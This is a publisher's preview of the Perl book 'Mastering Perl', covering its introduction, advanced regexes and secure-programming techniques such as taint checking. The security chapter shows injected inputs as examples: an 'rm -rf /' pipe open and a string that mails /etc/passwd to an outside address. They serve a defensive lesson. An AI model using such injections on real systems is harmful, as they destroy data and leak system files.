BUY THIS BOOK
Add to Cart

Print Book $39.99


Add to Cart

PDF $31.99

Safari Books Online

What is this?

Add to UK Cart

Print Book £24.99

What is this?

Looking to Reprint or License this content?


Mastering Perl
Mastering Perl

By brian d foy
Foreword by Randal L. Schwartz
Book Price: $39.99 USD
£24.99 GBP
PDF Price: $31.99

Cover | Table of Contents | Colophon


Table of Contents

Chapter 1: Introduction: Becoming a Master
This book isn’t going to make you a Perl master; you have to do that for yourself by programming a lot of Perl, trying a lot of new things, and making a lot of mistakes. I’m going to help you get on the right path. The road to mastery is one of self-reliance and independence. As a Perl master, you’ll be able to answer your own questions as well as those of others.
In the golden age of guilds, craftsmen followed a certain path, both literally and figuratively, as they mastered their craft. They started as apprentices and would do the boring bits of work until they had enough skill to become the more trusted journeymen. The journeyman had greater responsibility but still worked under a recognized master. When he had learned enough of the craft, the journeyman would produce a “master work” to prove his skill. If other masters deemed it adequately masterful, the journeyman became a recognized master himself.
The journeymen and masters also traveled (although people disagree on whether that’s where the “journey” part of the name came from) to other masters, where they would learn new techniques and skills. Each master knew things the others didn’t, perhaps deliberately guarding secret methods, or knew it in a different way. Part of a journeyman’s education was learning from more than one master.
Interactions with other masters and journeymen continued the master’s education. He learned from those masters with more experience and learned from himself as he taught journeymen, who also taught him because they brought skills they learned from other masters.
The path an apprentice followed affected what he learned. An apprentice who studied with more masters was exposed to many more perspectives and ways of teaching, all of which he could roll into his own way of doing things. Odd teachings from one master could be exposed by another, giving the apprentice a balanced view on things. Additionally, although the apprentice might be studying to be a carpenter or a mason, different masters applied those skills to different goals, giving the apprentice a chance to learn different applications and ways of doing things.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
What It Means to Be a Master
This book takes a different tone from Learning Perl and Intermediate Perl, which we designed as tutorial books. Those mostly cover the details of the Perl language and only a little on the practice of programming. Mastering Perl, however, puts more responsibility on you, the reader.
Now that you’ve made it this far in Perl, you’re working on your ability to answer your own questions and figure out things on your own, even if that’s a bit more work than simply asking someone. The very act of doing it yourself builds your experience as well as not annoying your coworkers.
Although I don’t cover other languages in this book, like Advanced Perl Programming, First Edition, by Sriram Srinivasan (O’Reilly) and Mastering Regular Expressions by Jeffrey Friedl (O’Reilly) do, you should learn some other languages. This informs your Perl knowledge and gives you new perspectives, some that make you appreciate Perl more and others that help you understand its limitations.
And, as a master, you will run into Perl’s limitations. I like to say that if you don’t have a list of five things you hate about Perl and the facts to back them up, you probably haven’t done enough Perl. It’s not really Perl’s fault. You’ll get that with any language. The mastery comes in by knowing these things and still choosing Perl because its strengths outweigh the weakness for your application. You’re a master because you know both sides of the problem and can make an informed choice that you can explain to others.
All of that means that becoming a master involves work, reading, and talking to other people. The more you do, the more you learn. There’s no shortcut to mastery. You may be able to learn the syntax quickly, as in any other language, but that will be the tiniest portion of your experience. Now that you know most of Perl, you’ll probably spend your time reading some of the “meta”-programming books that discuss the practice of programming rather than just slinging syntax. Those books will probably use a language that’s not Perl, but I’ve already said you need to learn some other languages, if only to be able to read these books. As a master, you’re always learning.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Who Should Read This Book
I wrote this book as a successor to Intermediate Perl, which covered the basics of references, objects, and modules. I’ll assume that you already know and feel comfortable with those features. Where possible, I make references to Intermediate Perl in case you need to refresh your skills on a topic.
If you’re coming directly from another language and haven’t used Perl yet, or have only used it lightly, you might want to skim Learning Perl and Intermediate Perl to get the basics of the language. Still, you might not recognize some of the idioms that come with experience and practice. I don’t want to tell you not to buy this book (hey, I need to pay my mortgage!), but you might not get the full value I intend, at least not right away.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
How to Read This Book
I’m not writing a third volume of “Yet More Perl Features.” I want to teach you how to learn Perl on your own. I’m setting you on your own path to mastery, and as an apprentice, you’ll need to do some work on your own. Sometimes this means I’ll show you where in the Perl documentation to get the answers (meaning I can use the saved space to talk about other topics).
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
What Should You Know Already?
I’ll presume that you already know everything that we covered in Learning Perl and Intermediate Perl. By we, I mean the Stonehenge Consulting Services crew and bestselling Perl coauthors Randal Schwartz, Tom Phoenix, and me.
Most importantly, you should know these subjects, each of which implies knowledge of other subjects:
  • Using Perl modules
  • Writing Perl modules
  • References to variables, subroutines, and filehandles
  • Basic regular expression syntax and workings
  • Object-oriented Perl
If I want to discuss something not in either of those books, I’ll explain it in a bit more depth. Even if we did cover it in the previous books, I might cover it again just because it’s that important.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
What I Cover
After learning the basic syntax of Perl in Learning Perl and the basics of modules and team programming in Intermediate Perl, the next thing you need to learn are the idioms of Perl and the integration of the skills that you already have to create robust and scalable applications that other people can use without your help.
I’ll cover some subjects you’ve seen in those two books, but in more depth. As we said in Learning Perl, we sometimes told white lies to simplify the details and to get you going as soon as possible without getting bogged down. Now it’s time to get a bit dirty in the bogs.
Don’t mistake my coverage of a subject for an endorsement, though. There are millions of Perl programmers in the world, and each has her own way of doing things. Part of becoming a Perl master involves reading quite a bit of Perl even if you wouldn’t write that Perl yourself. I’ll endeavor to tell you when I think you shouldn’t do something, but that’s really just my opinion. As you strive to be a good programmer, you’ll need to know more than you’ll use. Sometimes I’ll show things I don’t want you to use, but I know you’ll see in code from other people. Oh well, it’s not a perfect world.
Not all programming is about adding or adjusting features in code. Sometimes it’s pulling code apart to inspect it and watch it do its magic. Other times it’s about getting rid of code that you don’t need. The practice of programming is more than creating applications. It’s also about managing and wrangling code. Some of the techniques I’ll show are for analysis, not your own development.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
What I Don’t Cover
As I talked over the idea of this book with the editors, we decided not to duplicate the subjects more than adequately covered by other books. You need to learn from other masters, too, and I don’t really want to take up more space on your shelf than I really need. Ignoring those subjects gives me the double bonus of not writing those chapters and using that space for other things. You should already have read those other books anyway.
That doesn’t mean that you get to ignore those subjects, though, and where appropriate I’ll point you to the right book. In , I list some books I think you should add to your library as you move towards Perl mastery. Those books are by other Perl masters, each of whom has something to teach you. At the end of most chapters I point you toward other resources as well. A master never stops learning.
Since you’re already here, though, I’ll just give you the list of topics I’m explicitly avoiding, for whatever reason: Perl internals, embedding Perl, threads, best practices, object-oriented programming, source filters, and dolphins. This is a dolphin-safe book.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Chapter 2: Advanced Regular Expressions
Regular expressions, or just regexes, are at the core of Perl’s text processing, and certainly are one of the features that made Perl so popular. All Perl programmers pass through a stage where they try to program everything as regexes and, when that’s not challenging enough, everything as a single regex. Perl’s regexes have many more features than I can, or want, to present here, so I include those advanced features I find most useful and expect other Perl programmers to know about without referring to perlre, the documentation page for regexes.
I don’t have to know every pattern at the time that I code something. Perl allows me to interpolate variables into regexes. I might hard code those values, take them from user input, or get them in any other way I can get or create data. Here’s a tiny Perl program to do grep’s job. It takes the firstF argument from the command line and uses it as the regex in the while statement. That’s nothing special (yet); we showed you how to do this in Learning Perl. I can use the string in $regex as my pattern, and Perl compiles it when it interpolates the string in the match operator:
#!/usr/bin/perl
# perl-grep.pl

my $regex = shift @ARGV;

print "Regex is [$regex]\n";

while( <> )
        {
        print if m/$regex/;
        }
I can use this program from the command line to search for patterns in files. Here I search for the pattern new in all of the Perl programs in the current directory:
% perl-grep.pl new *.pl
Regex is [new]
my $regexp = Regexp::English->new
my $graph = GraphViz::Regex->new($regex);
                [ qr/\G(\n)/,                "newline"     ],
                                                { ( $1, "newline char"     ) }
print YAPE::Regex::Explain->new( $ARGV[0] )->explain;
What happens if I give it an invalid regex? I try it with a pattern that has an opening parenthesis without its closing mate:
$ ./perl-grep.pl "(perl" *.pl
Regex is [(perl]
Unmatched ( in regex; marked by <-- HERE in m/( <-- HERE perl/ 
        at ./perl-grep.pl line 10, <> line 1.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
References to Regular Expressions
I don’t have to know every pattern at the time that I code something. Perl allows me to interpolate variables into regexes. I might hard code those values, take them from user input, or get them in any other way I can get or create data. Here’s a tiny Perl program to do grep’s job. It takes the firstF argument from the command line and uses it as the regex in the while statement. That’s nothing special (yet); we showed you how to do this in Learning Perl. I can use the string in $regex as my pattern, and Perl compiles it when it interpolates the string in the match operator:
#!/usr/bin/perl
# perl-grep.pl

my $regex = shift @ARGV;

print "Regex is [$regex]\n";

while( <> )
        {
        print if m/$regex/;
        }
I can use this program from the command line to search for patterns in files. Here I search for the pattern new in all of the Perl programs in the current directory:
% perl-grep.pl new *.pl
Regex is [new]
my $regexp = Regexp::English->new
my $graph = GraphViz::Regex->new($regex);
                [ qr/\G(\n)/,                "newline"     ],
                                                { ( $1, "newline char"     ) }
print YAPE::Regex::Explain->new( $ARGV[0] )->explain;
What happens if I give it an invalid regex? I try it with a pattern that has an opening parenthesis without its closing mate:
$ ./perl-grep.pl "(perl" *.pl
Regex is [(perl]
Unmatched ( in regex; marked by <-- HERE in m/( <-- HERE perl/ 
        at ./perl-grep.pl line 10, <> line 1.
When I interpolate the regex in the match operator, Perl compiles the regex and immediately complains, stopping my program. To catch that, I want to compile the regex before I try to use it.
The qr// is a regex quoting operator that stores my regex in a scalar (and as a quoting operator, its documentation shows up in perlop). The qr// compiles the pattern so it’s ready to use when I interpolate $regex in the match operator. I wrap the eval operator around the qr// to catch the error, even though I end up die-ing anyway:
#!/usr/bin/perl
# perl-grep2.pl

my $pattern = shift @ARGV;

my $regex = eval { qr/$pattern/ };
die "Check your pattern! $@" if $@;

while( <> )
        {
        print if m/$regex/;
        }
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Noncapturing Grouping, (?:PATTERN)
Parentheses in regexes don’t have to trigger memory. I can use them simply for grouping by using the special sequence (?:PATTERN). This way, I don’t get unwanted data in my capturing groups.
Perhaps I want to match the names on either side of one of the conjunctions and or or. In @array I have some strings that express pairs. The conjunction may change, so in my regex I use the alternation and|or. My problem is precedence. The alternation is higher precedence than sequence, so I need to enclose the alternation in parentheses, (\S+) (and|or) (\S+), to make it work:
#!/usr/bin/perl

my @strings = (
        "Fred and Barney",
        "Gilligan or Skipper",
        "Fred and Ginger",
        );

foreach my $string ( @strings )
        {
        # $string =~ m/(\S+) and|or (\S+)/; # doesn't work
        $string =~ m/(\S+) (and|or) (\S+)/;

        print "\$1: $1\n\$2: $2\n\$3: $3\n";
        print "-" x 10, "\n";
        }
The output shows me an unwanted consequence of grouping the alternation: the part of the string in the parentheses shows up in the memory variables as $2 (). That’s an artifact.
Table : Unintended match memories
Not grouping and|or
Grouping and|or
$1: Fred
$2:
$3:
----------
$1:
$2: Skipper
$3:
----------
$1: Fred
$2:
$3:
----------
$1: Fred
$2: and
$3: Barney
----------
$1: Gilligan
$2: or
$3: Skipper
----------
$1: Fred
$2: and
$3: Ginger
----------
Using the parentheses solves my precedence problem, but now I have that extra memory variable. That gets in the way when I change the program to use a match in list context. All the memory variables, including the conjunction, show up in @names:
# extra element!
my @names = ( $string =~ m/(\S+) (and|or) (\S+)/ );
I want to simply group things without triggering memory. Instead of the regular parentheses I just used, I add ?: right after the opening parenthesis of the group, which turns them into noncapturing parentheses. Instead of (and|or), I now have (?:and|or). This form doesn’t trigger the memory variables, and they don’t count toward the numbering of the memory variables either. I can apply quantifiers just like the plain parentheses as well. Now I don’t get my extra element in
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Readable Regexes, /x and (?#...)
Regular expressions have a much deserved reputation of being hard to read. Regexes have their own terse language that uses as few characters as possible to represent virtually infinite numbers of possibilities, and that’s just counting the parts that most people use everyday.
Luckily for other people, Perl gives me the opportunity to make my regexes much easier to read. Given a little bit of formatting magic, not only will others be able to figure out what I’m trying to match, but a couple weeks later, so will I. We touched on this lightly in Learning Perl, but it’s such a good idea that I’m going to say more about it. It’s also in Perl Best Practices by Damian Conway (O’Reilly).
When I add the /x flag to either the match or substitution operators, Perl ignores literal whitespace in the pattern. This means that I spread out the parts of my pattern to make the pattern more discernible. Gisle Aas’s HTTP::Date module parses a date by trying several different regexes. Here’s one of his regular expressions, although I’ve modified it to appear on a single line, wrapped to fit on this page:
/^(\d\d?)(?:\s+|[-\/])(\w+)(?:\s+|[-\/])↲
(\d+)(?:(?:\s+|:)(\d\d?):(\d\d)(?::(\d\d))↲
?)?\s*([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)?\s*(?:\(\w+\))?\s*$/
Quick: Can you tell which one of the many date formats that parses? Me neither. Luckily, Gisle uses the /x flag to break apart the regex and add comments to show me what each piece of the pattern does. With /x, Perl ignores literal whitespace and Perl-style comments inside the regex. Here’s Gisle’s actual code, which is much easier to understand:
        /^
         (\d\d?)               # day
            (?:\s+|[-\/])
         (\w+)                 # month
            (?:\s+|[-\/])
         (\d+)                 # year
         (?:
               (?:\s+|:)       # separator before clock
            (\d\d?):(\d\d)     # hour:min
            (?::(\d\d))?       # optional seconds
         )?                    # optional clock
                \s*
         ([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)? # timezone
                \s*
         (?:\(\w+\))?          # ASCII representation of timezone in parens.
                \s*$
        /x
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Global Matching
In Learning Perl we told you about the /g flag that you can use to make all possible substitutions, but it’s more useful than that. I can use it with the match operator, where it does different things in scalar and list context. We told you that the match operator returns true if it matches and false otherwise. That’s still true (we wouldn’t have lied to you), but it’s not just a boolean value. The list context behavior is the most useful. With the /g flag, the match operator returns all of the memory matches:
$_ = "Just another Perl hacker,";
my @words = /(\S+)/g; # "Just" "another" "Perl" "hacker,"
Even though I only have one set of memory parentheses in my regular expression, it makes as many matches as it can. Once it makes a match, Perl starts where it left off and tries again. I’ll say more on that in a moment. I often run into another Perl idiom that’s closely related to this, in which I don’t want the actual matches, but just a count:
my $word_count = () = /(\S+)/g;
This uses a little-known but important rule: the result of a list assignment is the number of elements in the list on the right side. In this case, that’s the number of elements the match operator returns. This only works for a list assignment, which is assigning from a list on the right side to a list on the left side. That’s why I have the extra () in there.
In scalar context, the /g flag does some extra work we didn’t tell you about earlier. During a successful match, Perl remembers its position in the string, and when I match against that same string again, Perl starts where it left off in that string. It returns the result of one application of the pattern to the string:
$_ = "Just another Perl hacker,";
my @words = /(\S+)/g; # "Just" "another" "Perl" "hacker,"

while( /(\S+)/g ) # scalar context
        {
        print "Next word is '$1'\n";
        }
When I match against that same string again, Perl gets the next match:
Next word is 'Just'
Next word is 'another'
Next word is 'Perl'
Next word is 'hacker,'
I can even look at the match position as I go along. The built-in
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Lookarounds
Lookarounds are arbitrary anchors for regexes. We showed several anchors in Learning Perl, such as ^, $, and \b, and I just showed the \G anchor. Using a lookaround, I can describe my own anchor as a regex, and just like the other anchors, they don’t count as part of the pattern or consume part of the string. They specify a condition that must be true, but they don’t add to the part of the string that the overall pattern matches.
Lookarounds come in two flavors: lookaheads that look ahead to assert a condition immediately after the current match position, and lookbehinds that look behind to assert a condition immediately before the current match position. This sounds simple, but it’s easy to misapply these rules. The trick is to remember that it anchors to the current match position and then figure out on which side it applies.
Both lookaheads and lookbehinds have two types: positive and negative. The positive lookaround asserts that its pattern has to match. The negative lookaround asserts that its pattern doesn’t match. No matter which I choose, I have to remember that they apply to the current match position, not anywhere else in the string.
Lookahead assertions let me peek at the string immediately ahead of the current match position. The assertion doesn’t consume part of the string, and if it succeeds, matching picks up right after the current match position.

Positive lookahead assertions

In Learning Perl, we included an exercise to check for both “Fred” and “Wilma” on the same line of input, no matter the order they appeared on the line. The trick we wanted to show to the novice Perler is that two regexes can be simpler than one. One way to do this repeats both Wilma and Fred in the alternation so I can try either order. A second try separates them into two regexes:
#/usr/bin/perl
# fred-and-wilma.pl

$_ = "Here come Wilma and Fred!";
print "Matches: $_" if /Fred.*Wilma|Wilma.*Fred/;
print "Matches: $_" if /Fred/ && /Wilma/;
I can make a simple, single regex using a
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Deciphering Regular Expressions
While trying to figure out a regex, whether one I found in someone else’s code or one I wrote myself (maybe a long time ago), I can turn on Perl’s regex debugging mode.Perl’s -D switch turns on debugging options for the Perl interpreter (not for your program, as in ). The switch takes a series of letters or numbers to indicate what it should turn on. The -Dr option turns on regex parsing and execution debugging.
I can use a short program to examine a regex. The first argument is the match string and the second argument is the regular expression. I save this program as explain-regex:
#!/usr/bin/perl

$ARGV[0] =~ /$ARGV[1]/;
When I try this with the target string Just another Perl hacker, and the regex Just another (\S+) hacker,, I see two major sections of output, which the perldebguts documentation explains at length. First, Perl compiles the regex, and the -Dr output shows how Perl parsed the regex. It shows the regex nodes, such as EXACT and NSPACE, as well as any optimizations, such as anchored "Just another ". Second, it tries to match the target string, and shows its progress through the nodes. It’s a lot of information, but it shows me exactly what it’s doing:
$ perl -Dr explain-regex 'Just another Perl hacker,' 'Just another (\S+) hacker,'
Omitting $` $& $' support.

EXECUTING...

Compiling REx `Just another (\S+) hacker,'
size 15 Got 124 bytes for offset annotations.
first at 1
rarest char k at 4
rarest char J at 0
   1: EXACT <Just another >(6)
   6: OPEN1(8)
   8:   PLUS(10)
   9:     NSPACE(0)
  10: CLOSE1(12)
  12: EXACT < hacker,>(15)
  15: END(0)
anchored "Just another " at 0 floating " hacker," at 14..2147483647 (checking anchored) minlen 22
Offsets: [15]
                1[13] 0[0] 0[0] 0[0] 0[0] 14[1] 0[0] 17[1] 15[2] 18[1] 0[0] 19[8] 0[0] 0[0] 27[0]
Guessing start of match, REx "Just another (\S+) hacker," against "Just another Perl hacker,"...
Found anchored substr "Just another " at offset 0...
Found floating substr " hacker," at offset 17...
Guessed: match at offset 0
Matching REx "Just another (\S+) hacker," against "Just another Perl hacker,"
  Setting an EVAL scope, savestack=3
   0 <> <Just another>    |  1:  EXACT <Just another >
  13 <ther > <Perl ha>    |  6:  OPEN1
  13 <ther > <Perl ha>    |  8:  PLUS
                                                   NSPACE can match 4 times out of 2147483647...
  Setting an EVAL scope, savestack=3
  17 < Perl> < hacker>    | 10:    CLOSE1
  17 < Perl> < hacker>    | 12:    EXACT < hacker,>
  25 <Perl hacker,> <>    | 15:    END
Match successful!
Freeing REx: `"Just another (\\S+) hacker,"'
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Final Thoughts
It’s almost the end of the chapter, but there are still so many regular expression features I find useful. Consider this section a quick tour of the things you can look into on your own.
I don’t have to be content with the simple character classes such as \w (word characters), \d (digits), and the others denoted by slash sequences. I can also use the POSIX character classes. I enclose those in the square brackets with colons on both sides of the name:
print "Found alphabetic character!\n" if  $string =~ m/[:alpha:]/;
print "Found hex digit!\n"            if  $string =~ m/[:xdigit:]/;
I negate those with a caret, ^, after the first colon:
print "Didn't find alphabetic characters!\n" if  $string =~ m/[:^alpha:]/;
print "Didn't find spaces!\n" if  $string =~ m/[:^space:]/;
I can say the same thing in another way by specifying a named property. The \p{Name} sequence (little p) includes the characters for the named property, and the \P{Name} sequence (big P) is its complement:
print "Found ASCII character!\n"    if  $string =~ m/\p{IsASCII}/;
print "Found control characters!\n" if  $string =~ m/\p{IsCntrl}/;

print "Didn't find punctuation characters!\n" if  $string =~ m/\P{IsPunct}/;
print "Didn't find uppercase characters!\n"   if  $string =~ m/\P{IsUpper}/;
The Regexp::Common module provides pretested and known-to-work regexes for, well, common things such as web addresses, numbers, postal codes, and even profanity. It gives me a multilevel hash %RE that has as its values regexes. If I don’t like that, I can use its function interface:
use Regexp::Common;

print "Found a real number\n" if $string =~ /$RE{num}{real}/;

print "Found a real number\n" if $string =~ RE_num_real;
If I want to build up my own pattern, I can use Regexp::English, which uses a series of chained methods to return an object that stands in for a regex. It’s probably not something you want in a real program, but it’s fun to think about:
use Regexp::English;

my $regexp = Regexp::English->new
        ->literal( 'Just' )
                ->whitespace_char
        ->word_chars
                ->whitespace_char
        ->remember( \$type_of_hacker )
        ->word_chars
        ->end
                ->whitespace_char
        ->literal( 'hacker' );

$regexp->match( 'Just another Perl hacker,' );

print "The type of hacker is [$type_of_hacker]\n";
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Summary
This chapter covered some of the more useful advanced features of Perl’s regex engine. The qr() quoting operator lets me compile a regex for later and gives it back to me as a reference. With the special (?) sequences, I can make my regular expression much more powerful, as well as less complicated. The \G anchor allows me to anchor the next match where the last one left off, and using the /c flag, I can try several possibilities without resetting the match position if one of them fails.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Further Reading
perlre is the documentation for Perl regexes, and perlretut gives a regex tutorial. Don’t confuse that with perlreftut, the tutorial on references. To make it even more complicated, perlreref is the regex quick reference.
The details for regex debugging shows up in perldebguts. It explains the output of -Dr and re 'debug'.
Perl Best Practices has a section on regexes, and gives the \x “Extended Formatting” pride of place.
Mastering Regular Expressions covers regexes in general, and compares their implementation in different languages. Jeffrey Friedl has an especially nice description of lookahead and lookbehind operators. If you really want to know about regexes, this is the book to get.
Simon Cozens explains advanced regex features in two articles for Perl.com: “Regexp Power” (http://www.perl.com/pub/a/2003/06/06/regexps.html) and “Power Regexps, Part II” (http://www.perl.com/pub/a/2003/07/01/regexps.html).
The web site http://www.regular-expressions.info has good discussions about regular expressions and their implementations in different languages.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Chapter 3: Secure Programming Techniques
I can’t control how people run my programs or what input they give it, and given the chance, they’ll do everything I don’t expect. This can be a problem when my program tries to pass on that input to other programs. When I let just anyone run my programs, like I do with CGI programs, I have to be especially careful. Perl comes with features to help me protect myself against that, but they only work if I use them, and use them wisely.
If I don’t pay attention to the data I pass to functions that interact with the operating system, I can get myself in trouble. Take this innocuous-looking line of code that opens a file:
open my($fh), $file or die "Could not open [$file]: $!";
That looks harmless, so where’s the problem? As with most problems, the harm comes in a combination of things. What is in $file and from where did its value come? In real-life code reviews, I’ve seen people do such as using elements of @ARGV or an environment variable, neither of which I can control as the programmer:
my $file = $ARGV[0];

# OR ===
my $file = $ENV{FOO_CONFIG}
How can that cause problems? Look at the Perl documentation for open. Have you ever read all of the 400-plus lines of that entry in perlfunc, or its own manual, perlopentut? There are so many ways to open resources in Perl that it has its own documentation page. Several of those ways involve opening a pipe to another program:
open my($fh), "wc -l *.pod |";

open my($fh), "| mail joe@example.com";
To misuse these programs, I just need to get the right thing in $file so I execute a pipe open instead of a file open. That’s not so hard:
$ perl program.pl "| mail joe@example.com"

$ FOO_CONFIG="rm -rf / |" perl program
This can be especially nasty if I can get another user to run this for me. Any little chink in the armor contributes to the overall insecurity. Given enough pieces to put together, someone can eventually get to the point where she can compromise the system.
There are other things I can do to prevent this particular problem and I’ll discuss those at the end of this chapter, but in general, when I get input, I want to ensure that it’s what I expect before I do something with it. With careful programming, I won’t have to know about everything
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Bad Data Can Ruin Your Day
If I don’t pay attention to the data I pass to functions that interact with the operating system, I can get myself in trouble. Take this innocuous-looking line of code that opens a file:
open my($fh), $file or die "Could not open [$file]: $!";
That looks harmless, so where’s the problem? As with most problems, the harm comes in a combination of things. What is in $file and from where did its value come? In real-life code reviews, I’ve seen people do such as using elements of @ARGV or an environment variable, neither of which I can control as the programmer:
my $file = $ARGV[0];

# OR ===
my $file = $ENV{FOO_CONFIG}
How can that cause problems? Look at the Perl documentation for open. Have you ever read all of the 400-plus lines of that entry in perlfunc, or its own manual, perlopentut? There are so many ways to open resources in Perl that it has its own documentation page. Several of those ways involve opening a pipe to another program:
open my($fh), "wc -l *.pod |";

open my($fh), "| mail joe@example.com";
To misuse these programs, I just need to get the right thing in $file so I execute a pipe open instead of a file open. That’s not so hard:
$ perl program.pl "| mail joe@example.com"

$ FOO_CONFIG="rm -rf / |" perl program
This can be especially nasty if I can get another user to run this for me. Any little chink in the armor contributes to the overall insecurity. Given enough pieces to put together, someone can eventually get to the point where she can compromise the system.
There are other things I can do to prevent this particular problem and I’ll discuss those at the end of this chapter, but in general, when I get input, I want to ensure that it’s what I expect before I do something with it. With careful programming, I won’t have to know about everything open can do. It’s not going to be that much more work than the careless method, and it will be one less thing I have to worry about.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Taint Checking
Configuration is all about reaching outside the program to get data. When users choose the input, they can choose what the program does. This is more important when I write programs for other people to use. I can trust myself to give my own program the right data (usually), but other users, even those with the purest of intentions, might get it wrong.
Under taint checking, Perl doesn’t let me use unchecked data from outside the source code to affect things outside the program. Perl will stop my program with an error. Before I show more, though, understand that taint checking does not prevent bad things from happening. It merely helps me track down areas where some bad things might happen and tells me to fix those.
When I turn on taint checking with the -T switch, Perl marks any data that come from outside the program as tainted, or insecure, and Perl won’t let me use those data to interact with anything outside of the program. This way, I can avoid several security problems that come with communicating with other processes. This is all or nothing. Once I turn it on, it applies to the whole program and all of the data.
Perl sets up taint checking at compile time, and it affects the entire program for the entirety of its run. Perl has to see this option very early to allow it to work. I can put it in the shebang line in this toy program that uses the external command echo to print a message:
#!/usr/bin/perl -T

system qq|echo "Args are @ARGV"|;
Taint checking works just fine as long as I run the command directly. The operating system uses the shebang line to figure out which interpreter to run and which switches to pass to it. Perl catches the insecurity of the PATH. By using only a program name, system uses the PATH setting. Users can set that to anything they like before they run my program, and I’ve allowed outside data to influence the working of the program. When I run the program, Perl realizes that the PATH string is tamper-able, so it stops my program and reminds me about its insecurity:
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Untainting Data
The only approved way to untaint data is to extract the good parts of it using the regular expression memory matches. By design, Perl does not taint the parts of a string that I capture in regular expression memory, even if Perl tainted the source string. Perl trusts me to write a safe regular expression. Again, it’s up to me to make it safe.
In this line of code, I untaint the first element of @ARGV to extract a filename. I use a character class to specify exactly what I want. In this case, I only want letters, digits, underscores, dots, and hyphens. I don’t want anything that might be a directory separator:
my( $file ) = $ARGV[0] =~ m/^([A-Z0-9_.-]+)$/ig;
Notice that I constrain the regular expression so it has to match the entire string, too. That is, if it contains any characters that I didn’t include in the character class, the match fails. I’m not going to try to change invalid data into good data. You’ll have to think about how you want to handle that for each situation.
It’s really easy to use this incorrectly and some people annoyed with the strictness of taint checking try to untaint data without really untainting it. I can remove the taint of a variable with a trivial regular expression that matches everything:
my( $file ) = $ARGV[0] =~ m/(.*)/i;
If I want to do something like this, I might as well not even use taint checking. You might look out for this if you require your programmers to use taint checking and they want to avoid the extra work to do it right. I’ve caught this sort of statement in many code reviews, and it always surprises me that people get away with it.
I might be more diligent and still wrong, though. The character class shortcuts, \w and \W (and the POSIX version [:alpha:]), actually take their definitions from the locales. As a clever cracker, I could manipulate the locale setting in such a way to let through the dangerous characters I want to use. Instead of the implicit range of characters from the shortcut, I should explicitly state which characters I want. I can’t be too careful. It’s easier to list the allowed characters and add ones that I miss than to list the forbidden characters, since it also excludes problem characters I don’t know about yet.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
List Forms of system and exec
If I use either system or exec with a single argument, Perl looks in the argument for shell metacharacters. If it finds metacharacters, Perl passes the argument to the underlying shell for interpolation. Knowing this, I could construct a shell command that did something the program does not intend. Perhaps I have a system call that seems harmless, like the call to echo:
system( "/bin/echo $message" );
As a user of the program, I might try to craft the input so $message does more than provide an argument to echo. This string also terminates the command by using a semicolon, then starts a mail command that uses input redirection:
'Hello World!'; mail joe@example.com < /etc/passwd
Taint checking can catch this, but it’s still up to me to untaint it correctly. As I’ve shown, I can’t rely on taint checking to be safe. I can use system and exec in the list form. In that case, Perl uses the first argument as the program name and calls execvp directly, bypassing the shell and any interpolation or translation it might do:
system "/bin/echo", $message;
Using an array with system does not automatically trigger its list processing mode. If the array has only one element, system only sees one argument. If system sees any shell metacharacters in that single scalar element, it passes the whole command to the shell, special characters and all:
@args = ( "/bin/echo $message" );
system @args; # single argument form still, might go to shell

@args = ( "/bin/echo", $message );
system @args; # list form, which is fine.
To get around this special case, I can use the indirect object notation with either of these functions. Perl uses the indirect object as the name of the program to call and interprets the arguments just as it would in list form, even if it only has one element. Although this example looks like it might include $arg[0] twice, it really doesn’t. It’s a special indirection object notation that turns on the list processing mode and assumes that the first argument is the command name:
system { $args[0] } @args;
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Summary
Perl knows that injudiciously passing around data can cause problems and has features to give me, the programmer, ways to handle that. Taint checking is a tool that helps me find parts of the program that try to pass external data to resources outside of the program. Perl intends for me to scrutinize these data and turn them into something I can trust before I use them. Checking and scrubbing the data isn’t the only answer, and I need to program defensively using the other security features Perl offers. Even then, taint checking doesn’t ensure I’m completely safe and I still need to carefully consider the entire security environment just as I would with any other programming language.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Further Reading
Start with the perlsec documentation, which gives an overview of secure programming techniques for Perl.
The perltaint documentation gives the full details on taint checking. The entries in perlfunc for system and exec talk about their security features.
The perlfunc documentation explains everything the open built-in can do, and there is even more in perlopentut.
Although targeted toward web applications, the Open Web Application Security Project (OWASP, http://www.owasp.org) has plenty of good advice for all types of .
Even if you don’t want to read warnings from the Computer Emergency Response Team (CERT, http://www.cert.org) or SecurityFocus (http://www.securityfocus.com/), reading some of their advisories about perl interpreters or programs is often instructive.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Chapter 4: Debugging Perl
